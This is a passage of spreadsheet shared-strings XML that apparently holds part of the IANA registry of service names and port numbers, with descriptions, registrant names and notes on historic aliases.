    <t>STONEFALLS</t>
  </si>
  <si>
    <t>[Scott_Grau]</t>
  </si>
  <si>
    <t>identify</t>
  </si>
  <si>
    <t>hippad</t>
  </si>
  <si>
    <t>HIPPA Reporting Protocol</t>
  </si>
  <si>
    <t>zarkov</t>
  </si>
  <si>
    <t>ZARKOV Intelligent Agent Communication</t>
  </si>
  <si>
    <t>[Robin_Felix]</t>
  </si>
  <si>
    <t>boscap</t>
  </si>
  <si>
    <t>BOSCAP</t>
  </si>
  <si>
    <t>[Dirk_Hillbrecht]</t>
  </si>
  <si>
    <t>wkstn-mon</t>
  </si>
  <si>
    <t>WKSTN-MON</t>
  </si>
  <si>
    <t>[William_David]</t>
  </si>
  <si>
    <t>avenyo</t>
  </si>
  <si>
    <t>Avenyo Server</t>
  </si>
  <si>
    <t>[Bodo_Rueskamp]</t>
  </si>
  <si>
    <t>veritas-vis1</t>
  </si>
  <si>
    <t>VERITAS VIS1</t>
  </si>
  <si>
    <t>veritas-vis2</t>
  </si>
  <si>
    <t>VERITAS VIS2</t>
  </si>
  <si>
    <t>[Dinkar_Chivaluri]</t>
  </si>
  <si>
    <t>idrs</t>
  </si>
  <si>
    <t>IDRS</t>
  </si>
  <si>
    <t>[Jeff_Eaton]</t>
  </si>
  <si>
    <t>vsixml</t>
  </si>
  <si>
    <t>rebol</t>
  </si>
  <si>
    <t>REBOL</t>
  </si>
  <si>
    <t>[Holger_Kruse]</t>
  </si>
  <si>
    <t>realsecure</t>
  </si>
  <si>
    <t>Real Secure</t>
  </si>
  <si>
    <t>[Wes_Wilson]</t>
  </si>
  <si>
    <t>remoteware-un</t>
  </si>
  <si>
    <t>RemoteWare Unassigned</t>
  </si>
  <si>
    <t>[Tim_Farley]</t>
  </si>
  <si>
    <t>hbci</t>
  </si>
  <si>
    <t>HBCI</t>
  </si>
  <si>
    <t>[Kurt_Haubner]</t>
  </si>
  <si>
    <t>remoteware-cl</t>
  </si>
  <si>
    <t>RemoteWare Client</t>
  </si>
  <si>
    <t>origo-native</t>
  </si>
  <si>
    <t>OrigoDB Server Native Interface</t>
  </si>
  <si>
    <t>[Devrex_Labs]</t>
  </si>
  <si>
    <t>[Robert_Friberg]</t>
  </si>
  <si>
    <t>port 3001 previously "Removed on 2006-05-25"</t>
  </si>
  <si>
    <t>exlm-agent</t>
  </si>
  <si>
    <t>EXLM Agent</t>
  </si>
  <si>
    <t>[Randy_Martin]</t>
  </si>
  <si>
    <t>remoteware-srv</t>
  </si>
  <si>
    <t>RemoteWare Server</t>
  </si>
  <si>
    <t>cgms</t>
  </si>
  <si>
    <t>CGMS</t>
  </si>
  <si>
    <t>[Corey_Clinton]</t>
  </si>
  <si>
    <t>csoftragent</t>
  </si>
  <si>
    <t>Csoft Agent</t>
  </si>
  <si>
    <t>[Nedelcho_Stanev_2]</t>
  </si>
  <si>
    <t>geniuslm</t>
  </si>
  <si>
    <t>Genius License Manager</t>
  </si>
  <si>
    <t>[Jakob_Spies]</t>
  </si>
  <si>
    <t>ii-admin</t>
  </si>
  <si>
    <t>Instant Internet Admin</t>
  </si>
  <si>
    <t>[PerfTech_Inc]</t>
  </si>
  <si>
    <t>[Lewis_Donzis]</t>
  </si>
  <si>
    <t>lotusmtap</t>
  </si>
  <si>
    <t>Lotus Mail Tracking Agent Protocol</t>
  </si>
  <si>
    <t>[Ken_Lin]</t>
  </si>
  <si>
    <t>midnight-tech</t>
  </si>
  <si>
    <t>Midnight Technologies</t>
  </si>
  <si>
    <t>[Kyle_Unice]</t>
  </si>
  <si>
    <t>pxc-ntfy</t>
  </si>
  <si>
    <t>PXC-NTFY</t>
  </si>
  <si>
    <t>[Takeshi_Nishizawa]</t>
  </si>
  <si>
    <t>gw</t>
  </si>
  <si>
    <t>Telerate Workstation</t>
  </si>
  <si>
    <t>ping-pong</t>
  </si>
  <si>
    <t>[Timo_Sivonen]</t>
  </si>
  <si>
    <t>trusted-web</t>
  </si>
  <si>
    <t>Trusted Web</t>
  </si>
  <si>
    <t>twsdss</t>
  </si>
  <si>
    <t>Trusted Web Client</t>
  </si>
  <si>
    <t>[Alex_Duncan]</t>
  </si>
  <si>
    <t>gilatskysurfer</t>
  </si>
  <si>
    <t>Gilat Sky Surfer</t>
  </si>
  <si>
    <t>[Yossi_Gal]</t>
  </si>
  <si>
    <t>broker-service</t>
  </si>
  <si>
    <t>Broker Service
IANA assigned this well-formed service name as a replacement for "broker_service".</t>
  </si>
  <si>
    <t>[Dale_Bethers]</t>
  </si>
  <si>
    <t>broker_service</t>
  </si>
  <si>
    <t>Broker Service</t>
  </si>
  <si>
    <t>This entry is an alias to "broker-service".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>nati-dstp</t>
  </si>
  <si>
    <t>NATI DSTP</t>
  </si>
  <si>
    <t>[Paul_Austin]</t>
  </si>
  <si>
    <t>notify-srvr</t>
  </si>
  <si>
    <t>Notify Server
IANA assigned this well-formed service name as a replacement for "notify_srvr".</t>
  </si>
  <si>
    <t>[Hugo_Parra]</t>
  </si>
  <si>
    <t>notify_srvr</t>
  </si>
  <si>
    <t>Notify Server</t>
  </si>
  <si>
    <t>This entry is an alias to "notify-srvr".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>event-listener</t>
  </si>
  <si>
    <t>Event Listener
IANA assigned this well-formed service name as a replacement for "event_listener".</t>
  </si>
  <si>
    <t>[Ted_Tronson]</t>
  </si>
  <si>
    <t>event_listener</t>
  </si>
  <si>
    <t>Event Listener</t>
  </si>
  <si>
    <t>This entry is an alias to "event-listener".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>srvc-registry</t>
  </si>
  <si>
    <t>Service Registry
IANA assigned this well-formed service name as a replacement for "srvc_registry".</t>
  </si>
  <si>
    <t>[Mark_Killgore]</t>
  </si>
  <si>
    <t>srvc_registry</t>
  </si>
  <si>
    <t>Service Registry</t>
  </si>
  <si>
    <t>This entry is an alias to "srvc-registry".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>resource-mgr</t>
  </si>
  <si>
    <t>Resource Manager
IANA assigned this well-formed service name as a replacement for "resource_mgr".</t>
  </si>
  <si>
    <t>[Gary_Glover]</t>
  </si>
  <si>
    <t>resource_mgr</t>
  </si>
  <si>
    <t>Resource Manager</t>
  </si>
  <si>
    <t>This entry is an alias to "resource-mgr".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>cifs</t>
  </si>
  <si>
    <t>CIFS</t>
  </si>
  <si>
    <t>[Paul_Leach]</t>
  </si>
  <si>
    <t>agriserver</t>
  </si>
  <si>
    <t>AGRI Server</t>
  </si>
  <si>
    <t>[Frank_Neulichedl]</t>
  </si>
  <si>
    <t>csregagent</t>
  </si>
  <si>
    <t>CSREGAGENT</t>
  </si>
  <si>
    <t>magicnotes</t>
  </si>
  <si>
    <t>[Karl_Edwall]</t>
  </si>
  <si>
    <t>nds-sso</t>
  </si>
  <si>
    <t>NDS_SSO
IANA assigned this well-formed service name as a replacement for "nds_sso".</t>
  </si>
  <si>
    <t>[Mel_Oyler]</t>
  </si>
  <si>
    <t>nds_sso</t>
  </si>
  <si>
    <t>NDS_SSO</t>
  </si>
  <si>
    <t>This entry is an alias to "nds-sso".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>arepa-raft</t>
  </si>
  <si>
    <t>Arepa Raft</t>
  </si>
  <si>
    <t>[Stuart_Schaefer]</t>
  </si>
  <si>
    <t>agri-gateway</t>
  </si>
  <si>
    <t>AGRI Gateway</t>
  </si>
  <si>
    <t>[Agri_Datalog]</t>
  </si>
  <si>
    <t>LiebDevMgmt-C</t>
  </si>
  <si>
    <t>LiebDevMgmt_C
IANA assigned this well-formed service name as a replacement for "LiebDevMgmt_C".</t>
  </si>
  <si>
    <t>LiebDevMgmt_C</t>
  </si>
  <si>
    <t>This entry is an alias to "LiebDevMgmt-C".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>LiebDevMgmt-DM</t>
  </si>
  <si>
    <t>LiebDevMgmt_DM
IANA assigned this well-formed service name as a replacement for "LiebDevMgmt_DM".</t>
  </si>
  <si>
    <t>LiebDevMgmt_DM</t>
  </si>
  <si>
    <t>This entry is an alias to "LiebDevMgmt-DM".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>LiebDevMgmt-A</t>
  </si>
  <si>
    <t>LiebDevMgmt_A
IANA assigned this well-formed service name as a replacement for "LiebDevMgmt_A".</t>
  </si>
  <si>
    <t>[Mike_Velten]</t>
  </si>
  <si>
    <t>LiebDevMgmt_A</t>
  </si>
  <si>
    <t>This entry is an alias to "LiebDevMgmt-A".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>arepa-cas</t>
  </si>
  <si>
    <t>Arepa Cas</t>
  </si>
  <si>
    <t>eppc</t>
  </si>
  <si>
    <t>Remote AppleEvents/PPC Toolbox</t>
  </si>
  <si>
    <t>[Steve_Zellers]</t>
  </si>
  <si>
    <t>redwood-chat</t>
  </si>
  <si>
    <t>Redwood Chat</t>
  </si>
  <si>
    <t>pdb</t>
  </si>
  <si>
    <t>PDB</t>
  </si>
  <si>
    <t>[Don_Bowman]</t>
  </si>
  <si>
    <t>osmosis-aeea</t>
  </si>
  <si>
    <t>Osmosis / Helix (R) AEEA Port</t>
  </si>
  <si>
    <t>[Larry_Atkin]</t>
  </si>
  <si>
    <t>fjsv-gssagt</t>
  </si>
  <si>
    <t>FJSV gssagt</t>
  </si>
  <si>
    <t>[Tomoji_Koike]</t>
  </si>
  <si>
    <t>hagel-dump</t>
  </si>
  <si>
    <t>Hagel DUMP</t>
  </si>
  <si>
    <t>[Haim_Gelfenbeyn]</t>
  </si>
  <si>
    <t>hp-san-mgmt</t>
  </si>
  <si>
    <t>HP SAN Mgmt</t>
  </si>
  <si>
    <t>[Steve_Britt]</t>
  </si>
  <si>
    <t>santak-ups</t>
  </si>
  <si>
    <t>Santak UPS</t>
  </si>
  <si>
    <t>[Tom_Liu]</t>
  </si>
  <si>
    <t>cogitate</t>
  </si>
  <si>
    <t>Cogitate, Inc.</t>
  </si>
  <si>
    <t>[Jim_Harlan]</t>
  </si>
  <si>
    <t>tomato-springs</t>
  </si>
  <si>
    <t>Tomato Springs</t>
  </si>
  <si>
    <t>[Jack_Waller_III]</t>
  </si>
  <si>
    <t>di-traceware</t>
  </si>
  <si>
    <t>[Carlos_Hung]</t>
  </si>
  <si>
    <t>journee</t>
  </si>
  <si>
    <t>[Kevin_Calman]</t>
  </si>
  <si>
    <t>brp</t>
  </si>
  <si>
    <t>Broadcast Routing Protocol</t>
  </si>
  <si>
    <t>[John_Border]</t>
  </si>
  <si>
    <t>EndPoint Protocol</t>
  </si>
  <si>
    <t>[Stephen_Cipolli]</t>
  </si>
  <si>
    <t>responsenet</t>
  </si>
  <si>
    <t>ResponseNet</t>
  </si>
  <si>
    <t>[Chul_Yoon]</t>
  </si>
  <si>
    <t>di-ase</t>
  </si>
  <si>
    <t>hlserver</t>
  </si>
  <si>
    <t>Fast Security HL Server</t>
  </si>
  <si>
    <t>[Safenet_Inc.]</t>
  </si>
  <si>
    <t>[Michael_Zunke_3]</t>
  </si>
  <si>
    <t>pctrader</t>
  </si>
  <si>
    <t>Sierra Net PC Trader</t>
  </si>
  <si>
    <t>[Chris_Hahn]</t>
  </si>
  <si>
    <t>nsws</t>
  </si>
  <si>
    <t>NSWS</t>
  </si>
  <si>
    <t>[Ray_Gwinn]</t>
  </si>
  <si>
    <t>gds-db</t>
  </si>
  <si>
    <t>gds_db
IANA assigned this well-formed service name as a replacement for "gds_db".</t>
  </si>
  <si>
    <t>[Madhukar_N_Thakur]</t>
  </si>
  <si>
    <t>gds_db</t>
  </si>
  <si>
    <t>This entry is an alias to "gds-db".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>galaxy-server</t>
  </si>
  <si>
    <t>Galaxy Server</t>
  </si>
  <si>
    <t>[Michael_Andre]</t>
  </si>
  <si>
    <t>apc-3052</t>
  </si>
  <si>
    <t>APC 3052</t>
  </si>
  <si>
    <t>dsom-server</t>
  </si>
  <si>
    <t>[Daniel_Sisk]</t>
  </si>
  <si>
    <t>amt-cnf-prot</t>
  </si>
  <si>
    <t>AMT CNF PROT</t>
  </si>
  <si>
    <t>[Marco_Marcucci]</t>
  </si>
  <si>
    <t>policyserver</t>
  </si>
  <si>
    <t>Policy Server</t>
  </si>
  <si>
    <t>cdl-server</t>
  </si>
  <si>
    <t>CDL Server</t>
  </si>
  <si>
    <t>goahead-fldup</t>
  </si>
  <si>
    <t>GoAhead FldUp</t>
  </si>
  <si>
    <t>[Alan_Pickrell]</t>
  </si>
  <si>
    <t>videobeans</t>
  </si>
  <si>
    <t>[Hiroyuki_Takahashi]</t>
  </si>
  <si>
    <t>qsoft</t>
  </si>
  <si>
    <t>[James_Kunz]</t>
  </si>
  <si>
    <t>interserver</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 3060</t>
  </si>
  <si>
    <t>cautcpd</t>
  </si>
  <si>
    <t>ncacn-ip-tcp</t>
  </si>
  <si>
    <t>ncadg-ip-udp</t>
  </si>
  <si>
    <t>[Gabi_Kalmar]</t>
  </si>
  <si>
    <t>rprt</t>
  </si>
  <si>
    <t>Remote Port Redirector</t>
  </si>
  <si>
    <t>[Robin_Johnston]</t>
  </si>
  <si>
    <t>slinterbase</t>
  </si>
  <si>
    <t>[Bie_Tie]</t>
  </si>
  <si>
    <t>netattachsdmp</t>
  </si>
  <si>
    <t>NETATTACHSDMP</t>
  </si>
  <si>
    <t>[Mike_Young]</t>
  </si>
  <si>
    <t>fjhpjp</t>
  </si>
  <si>
    <t>FJHPJP</t>
  </si>
  <si>
    <t>[Ryozo_Furutani]</t>
  </si>
  <si>
    <t>ls3bcast</t>
  </si>
  <si>
    <t>ls3 Broadcast</t>
  </si>
  <si>
    <t>ls3</t>
  </si>
  <si>
    <t>[Jim_Thompson]</t>
  </si>
  <si>
    <t>mgxswitch</t>
  </si>
  <si>
    <t>MGXSWITCH</t>
  </si>
  <si>
    <t>[George_Walter]</t>
  </si>
  <si>
    <t>xplat-replicate</t>
  </si>
  <si>
    <t>Crossplatform replication protocol</t>
  </si>
  <si>
    <t>[NetApp_3]</t>
  </si>
  <si>
    <t>[Ravindra_Kuramkote]</t>
  </si>
  <si>
    <t>csd-monitor</t>
  </si>
  <si>
    <t>ContinuStor Monitor Port</t>
  </si>
  <si>
    <t>vcrp</t>
  </si>
  <si>
    <t>Very simple chatroom prot</t>
  </si>
  <si>
    <t>[Andreas_Wurf]</t>
  </si>
  <si>
    <t>xbox</t>
  </si>
  <si>
    <t>Xbox game port</t>
  </si>
  <si>
    <t>[Damon_Danieli]</t>
  </si>
  <si>
    <t>orbix-locator</t>
  </si>
  <si>
    <t>Orbix 2000 Locator</t>
  </si>
  <si>
    <t>orbix-config</t>
  </si>
  <si>
    <t>Orbix 2000 Config</t>
  </si>
  <si>
    <t>orbix-loc-ssl</t>
  </si>
  <si>
    <t>Orbix 2000 Locator SSL</t>
  </si>
  <si>
    <t>orbix-cfg-ssl</t>
  </si>
  <si>
    <t>[Eric_Newcomer]</t>
  </si>
  <si>
    <t>lv-frontpanel</t>
  </si>
  <si>
    <t>LV Front Panel</t>
  </si>
  <si>
    <t>[Darshan_Shah]</t>
  </si>
  <si>
    <t>stm-pproc</t>
  </si>
  <si>
    <t>stm_pproc
IANA assigned this well-formed service name as a replacement for "stm_pproc".</t>
  </si>
  <si>
    <t>[Paul_McGinnis]</t>
  </si>
  <si>
    <t>stm_pproc</t>
  </si>
  <si>
    <t>This entry is an alias to "stm-pproc".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>tl1-lv</t>
  </si>
  <si>
    <t>TL1-LV</t>
  </si>
  <si>
    <t>tl1-raw</t>
  </si>
  <si>
    <t>TL1-RAW</t>
  </si>
  <si>
    <t>tl1-telnet</t>
  </si>
  <si>
    <t>TL1-TELNET</t>
  </si>
  <si>
    <t>[SONET_Internetworkin]</t>
  </si>
  <si>
    <t>itm-mccs</t>
  </si>
  <si>
    <t>ITM-MCCS</t>
  </si>
  <si>
    <t>pcihreq</t>
  </si>
  <si>
    <t>PCIHReq</t>
  </si>
  <si>
    <t>[Paul_Sanders]</t>
  </si>
  <si>
    <t>jdl-dbkitchen</t>
  </si>
  <si>
    <t>JDL-DBKitchen</t>
  </si>
  <si>
    <t>[Hideo_Wakabayashi]</t>
  </si>
  <si>
    <t>asoki-sma</t>
  </si>
  <si>
    <t>Asoki SMA</t>
  </si>
  <si>
    <t>[Andrew_Mossberg]</t>
  </si>
  <si>
    <t>xdtp</t>
  </si>
  <si>
    <t>eXtensible Data Transfer Protocol</t>
  </si>
  <si>
    <t>[Michael_Shearson]</t>
  </si>
  <si>
    <t>ptk-alink</t>
  </si>
  <si>
    <t>ParaTek Agent Linking</t>
  </si>
  <si>
    <t>[Robert_Hodgson_2]</t>
  </si>
  <si>
    <t>stss</t>
  </si>
  <si>
    <t>Senforce Session Services</t>
  </si>
  <si>
    <t>[Peter_Boucher]</t>
  </si>
  <si>
    <t>1ci-smcs</t>
  </si>
  <si>
    <t>1Ci Server Management</t>
  </si>
  <si>
    <t>[Ralf_Bensmann]</t>
  </si>
  <si>
    <t>rapidmq-center</t>
  </si>
  <si>
    <t>Jiiva RapidMQ Center</t>
  </si>
  <si>
    <t>rapidmq-reg</t>
  </si>
  <si>
    <t>Jiiva RapidMQ Registry</t>
  </si>
  <si>
    <t>[Mark_Ericksen]</t>
  </si>
  <si>
    <t>panasas</t>
  </si>
  <si>
    <t>Panasas rendezvous port</t>
  </si>
  <si>
    <t>[Patrick_Keane]</t>
  </si>
  <si>
    <t>ndl-aps</t>
  </si>
  <si>
    <t>Active Print Server Port</t>
  </si>
  <si>
    <t>itu-bicc-stc</t>
  </si>
  <si>
    <t>ITU-T Q.1902.1/Q.2150.3</t>
  </si>
  <si>
    <t>[Greg_Sidebottom]</t>
  </si>
  <si>
    <t>umm-port</t>
  </si>
  <si>
    <t>Universal Message Manager</t>
  </si>
  <si>
    <t>[Phil_Braham]</t>
  </si>
  <si>
    <t>chmd</t>
  </si>
  <si>
    <t>CHIPSY Machine Daemon</t>
  </si>
  <si>
    <t>[Trond_Borsting]</t>
  </si>
  <si>
    <t>opcon-xps</t>
  </si>
  <si>
    <t>OpCon/xps</t>
  </si>
  <si>
    <t>[David_Bourland]</t>
  </si>
  <si>
    <t>hp-pxpib</t>
  </si>
  <si>
    <t>HP PolicyXpert PIB Server</t>
  </si>
  <si>
    <t>[Brian_O_Keefe]</t>
  </si>
  <si>
    <t>slslavemon</t>
  </si>
  <si>
    <t>SoftlinK Slave Mon Port</t>
  </si>
  <si>
    <t>[Moshe_Livne]</t>
  </si>
  <si>
    <t>autocuesmi</t>
  </si>
  <si>
    <t>Autocue SMI Protocol</t>
  </si>
  <si>
    <t>autocuelog</t>
  </si>
  <si>
    <t>Autocue Logger Protocol</t>
  </si>
  <si>
    <t>autocuetime</t>
  </si>
  <si>
    <t>Autocue Time Service</t>
  </si>
  <si>
    <t>[Geoff_Back]</t>
  </si>
  <si>
    <t>cardbox</t>
  </si>
  <si>
    <t>Cardbox</t>
  </si>
  <si>
    <t>cardbox-http</t>
  </si>
  <si>
    <t>Cardbox HTTP</t>
  </si>
  <si>
    <t>[Martin_Kochanski]</t>
  </si>
  <si>
    <t>business</t>
  </si>
  <si>
    <t>Business protocol</t>
  </si>
  <si>
    <t>geolocate</t>
  </si>
  <si>
    <t>Geolocate protocol</t>
  </si>
  <si>
    <t>personnel</t>
  </si>
  <si>
    <t>Personnel protocol</t>
  </si>
  <si>
    <t>sim-control</t>
  </si>
  <si>
    <t>simulator control port</t>
  </si>
  <si>
    <t>[Ian_Bell]</t>
  </si>
  <si>
    <t>wsynch</t>
  </si>
  <si>
    <t>Web Synchronous Services</t>
  </si>
  <si>
    <t>[Valery_Fremaux]</t>
  </si>
  <si>
    <t>ksysguard</t>
  </si>
  <si>
    <t>KDE System Guard</t>
  </si>
  <si>
    <t>[Chris_Schlaeger]</t>
  </si>
  <si>
    <t>cs-auth-svr</t>
  </si>
  <si>
    <t>CS-Authenticate Svr Port</t>
  </si>
  <si>
    <t>[Cliff_Diamond][Andy_Georgiou]</t>
  </si>
  <si>
    <t>ccmad</t>
  </si>
  <si>
    <t>CCM AutoDiscover</t>
  </si>
  <si>
    <t>[Ram_Sudama]</t>
  </si>
  <si>
    <t>mctet-master</t>
  </si>
  <si>
    <t>MCTET Master</t>
  </si>
  <si>
    <t>mctet-gateway</t>
  </si>
  <si>
    <t>MCTET Gateway</t>
  </si>
  <si>
    <t>mctet-jserv</t>
  </si>
  <si>
    <t>MCTET Jserv</t>
  </si>
  <si>
    <t>pkagent</t>
  </si>
  <si>
    <t>PKAgent</t>
  </si>
  <si>
    <t>[Michael_Douglass]</t>
  </si>
  <si>
    <t>d2000kernel</t>
  </si>
  <si>
    <t>D2000 Kernel Port</t>
  </si>
  <si>
    <t>d2000webserver</t>
  </si>
  <si>
    <t>D2000 Webserver Port</t>
  </si>
  <si>
    <t>[Tomas_Rajcan]</t>
  </si>
  <si>
    <t>pcmk-remote</t>
  </si>
  <si>
    <t>The pacemaker remote (pcmk-remote) service extends high availability functionality outside of the Linux cluster into remote nodes.</t>
  </si>
  <si>
    <t>[David_Vossel]</t>
  </si>
  <si>
    <t>[Andrew_Beekhof]</t>
  </si>
  <si>
    <t>port 3121 previously noted "Removed on 2003-09-17"</t>
  </si>
  <si>
    <t>vtr-emulator</t>
  </si>
  <si>
    <t>MTI VTR Emulator port</t>
  </si>
  <si>
    <t>[John_Mertus]</t>
  </si>
  <si>
    <t>edix</t>
  </si>
  <si>
    <t>EDI Translation Protocol</t>
  </si>
  <si>
    <t>beacon-port</t>
  </si>
  <si>
    <t>Beacon Port</t>
  </si>
  <si>
    <t>[James_Paul_Duncan]</t>
  </si>
  <si>
    <t>a13-an</t>
  </si>
  <si>
    <t>A13-AN Interface</t>
  </si>
  <si>
    <t>[Douglas_Knisely]</t>
  </si>
  <si>
    <t>ctx-bridge</t>
  </si>
  <si>
    <t>CTX Bridge Port</t>
  </si>
  <si>
    <t>[Alexander_Dubrovsky]</t>
  </si>
  <si>
    <t>ndl-aas</t>
  </si>
  <si>
    <t>Active API Server Port</t>
  </si>
  <si>
    <t>netport-id</t>
  </si>
  <si>
    <t>NetPort Discovery Port</t>
  </si>
  <si>
    <t>[P_T_K_Farrar]</t>
  </si>
  <si>
    <t>icpv2</t>
  </si>
  <si>
    <t>ICPv2</t>
  </si>
  <si>
    <t>[Duane_Wessels]</t>
  </si>
  <si>
    <t>netbookmark</t>
  </si>
  <si>
    <t>Net Book Mark</t>
  </si>
  <si>
    <t>[Yiftach_Ravid]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 3131</t>
  </si>
  <si>
    <t>ms-rule-engine</t>
  </si>
  <si>
    <t>Microsoft Business Rule Engine Update Service</t>
  </si>
  <si>
    <t>[Anush_Kumar]</t>
  </si>
  <si>
    <t>prism-deploy</t>
  </si>
  <si>
    <t>Prism Deploy User Port</t>
  </si>
  <si>
    <t>[Joan_Linck]</t>
  </si>
  <si>
    <t>ecp</t>
  </si>
  <si>
    <t>Extensible Code Protocol</t>
  </si>
  <si>
    <t>[Jim_Trek][Mark_Bocko]</t>
  </si>
  <si>
    <t>peerbook-port</t>
  </si>
  <si>
    <t>PeerBook Port</t>
  </si>
  <si>
    <t>[John_Flowers]</t>
  </si>
  <si>
    <t>grubd</t>
  </si>
  <si>
    <t>Grub Server Port</t>
  </si>
  <si>
    <t>[Kord_Campbell]</t>
  </si>
  <si>
    <t>rtnt-1</t>
  </si>
  <si>
    <t>rtnt-1 data packets</t>
  </si>
  <si>
    <t>rtnt-2</t>
  </si>
  <si>
    <t>rtnt-2 data packets</t>
  </si>
  <si>
    <t>[Ron_Muellerschoen]</t>
  </si>
  <si>
    <t>incognitorv</t>
  </si>
  <si>
    <t>Incognito Rendez-Vous</t>
  </si>
  <si>
    <t>[Stephane_Bourque]</t>
  </si>
  <si>
    <t>ariliamulti</t>
  </si>
  <si>
    <t>Arilia Multiplexor</t>
  </si>
  <si>
    <t>[Stephane_Bourque_2]</t>
  </si>
  <si>
    <t>vmodem</t>
  </si>
  <si>
    <t>VMODEM</t>
  </si>
  <si>
    <t>rdc-wh-eos</t>
  </si>
  <si>
    <t>RDC WH EOS</t>
  </si>
  <si>
    <t>[Udi_Nir]</t>
  </si>
  <si>
    <t>seaview</t>
  </si>
  <si>
    <t>Sea View</t>
  </si>
  <si>
    <t>[Jim_Flaherty_2]</t>
  </si>
  <si>
    <t>tarantella</t>
  </si>
  <si>
    <t>Tarantella</t>
  </si>
  <si>
    <t>[Roger_Binns]</t>
  </si>
  <si>
    <t>csi-lfap</t>
  </si>
  <si>
    <t>CSI-LFAP</t>
  </si>
  <si>
    <t>[Paul_Amsden]</t>
  </si>
  <si>
    <t>Known UNAUTHORIZED USE: port 3145</t>
  </si>
  <si>
    <t>bears-02</t>
  </si>
  <si>
    <t>[Bruce_McKinnon_2]</t>
  </si>
  <si>
    <t>rfio</t>
  </si>
  <si>
    <t>RFIO</t>
  </si>
  <si>
    <t>[Frederic_Hemmer]</t>
  </si>
  <si>
    <t>nm-game-admin</t>
  </si>
  <si>
    <t>NetMike Game Administrator</t>
  </si>
  <si>
    <t>nm-game-server</t>
  </si>
  <si>
    <t>NetMike Game Server</t>
  </si>
  <si>
    <t>nm-asses-admin</t>
  </si>
  <si>
    <t>NetMike Assessor Administrator</t>
  </si>
  <si>
    <t>nm-assessor</t>
  </si>
  <si>
    <t>NetMike Assessor</t>
  </si>
  <si>
    <t>[Andrew_Sharpe]</t>
  </si>
  <si>
    <t>feitianrockey</t>
  </si>
  <si>
    <t>FeiTian Port</t>
  </si>
  <si>
    <t>[Huang_Yu]</t>
  </si>
  <si>
    <t>s8-client-port</t>
  </si>
  <si>
    <t>S8Cargo Client Port</t>
  </si>
  <si>
    <t>[Jon_S_Kyle]</t>
  </si>
  <si>
    <t>ccmrmi</t>
  </si>
  <si>
    <t>ON RMI Registry</t>
  </si>
  <si>
    <t>jpegmpeg</t>
  </si>
  <si>
    <t>JpegMpeg Port</t>
  </si>
  <si>
    <t>[Richard_Bassous]</t>
  </si>
  <si>
    <t>indura</t>
  </si>
  <si>
    <t>Indura Collector</t>
  </si>
  <si>
    <t>[Bruce_Kosbab]</t>
  </si>
  <si>
    <t>e3consultants</t>
  </si>
  <si>
    <t>CCC Listener Port</t>
  </si>
  <si>
    <t>[Brian_Carnell]</t>
  </si>
  <si>
    <t>stvp</t>
  </si>
  <si>
    <t>SmashTV Protocol</t>
  </si>
  <si>
    <t>[Christian_Wolff]</t>
  </si>
  <si>
    <t>navegaweb-port</t>
  </si>
  <si>
    <t>NavegaWeb Tarification</t>
  </si>
  <si>
    <t>[Miguel_Angel_Fernand]</t>
  </si>
  <si>
    <t>tip-app-server</t>
  </si>
  <si>
    <t>TIP Application Server</t>
  </si>
  <si>
    <t>[Olivier_Mascia]</t>
  </si>
  <si>
    <t>doc1lm</t>
  </si>
  <si>
    <t>DOC1 License Manager</t>
  </si>
  <si>
    <t>[Greg_Goodson]</t>
  </si>
  <si>
    <t>sflm</t>
  </si>
  <si>
    <t>SFLM</t>
  </si>
  <si>
    <t>[System_Administrator]</t>
  </si>
  <si>
    <t>res-sap</t>
  </si>
  <si>
    <t>RES-SAP</t>
  </si>
  <si>
    <t>imprs</t>
  </si>
  <si>
    <t>IMPRS</t>
  </si>
  <si>
    <t>[Lars_Bohn]</t>
  </si>
  <si>
    <t>newgenpay</t>
  </si>
  <si>
    <t>Newgenpay Engine Service</t>
  </si>
  <si>
    <t>[Ilan_Zisser]</t>
  </si>
  <si>
    <t>sossecollector</t>
  </si>
  <si>
    <t>Quest Spotlight Out-Of-Process Collector</t>
  </si>
  <si>
    <t>[Greg_Cottman]</t>
  </si>
  <si>
    <t>nowcontact</t>
  </si>
  <si>
    <t>Now Contact Public Server</t>
  </si>
  <si>
    <t>poweronnud</t>
  </si>
  <si>
    <t>Now Up-to-Date Public Server</t>
  </si>
  <si>
    <t>[John_Wallace]</t>
  </si>
  <si>
    <t>serverview-as</t>
  </si>
  <si>
    <t>SERVERVIEW-AS</t>
  </si>
  <si>
    <t>serverview-asn</t>
  </si>
  <si>
    <t>SERVERVIEW-ASN</t>
  </si>
  <si>
    <t>serverview-gf</t>
  </si>
  <si>
    <t>SERVERVIEW-GF</t>
  </si>
  <si>
    <t>serverview-rm</t>
  </si>
  <si>
    <t>SERVERVIEW-RM</t>
  </si>
  <si>
    <t>serverview-icc</t>
  </si>
  <si>
    <t>SERVERVIEW-ICC</t>
  </si>
  <si>
    <t>[Detlef_Rothe]</t>
  </si>
  <si>
    <t>armi-server</t>
  </si>
  <si>
    <t>ARMI Server</t>
  </si>
  <si>
    <t>[Bobby_Martin]</t>
  </si>
  <si>
    <t>t1-e1-over-ip</t>
  </si>
  <si>
    <t>T1_E1_Over_IP</t>
  </si>
  <si>
    <t>[Mark_Doyle]</t>
  </si>
  <si>
    <t>ars-master</t>
  </si>
  <si>
    <t>ARS Master</t>
  </si>
  <si>
    <t>phonex-port</t>
  </si>
  <si>
    <t>Phonex Protocol</t>
  </si>
  <si>
    <t>[Doug_Grover]</t>
  </si>
  <si>
    <t>radclientport</t>
  </si>
  <si>
    <t>Radiance UltraEdge Port</t>
  </si>
  <si>
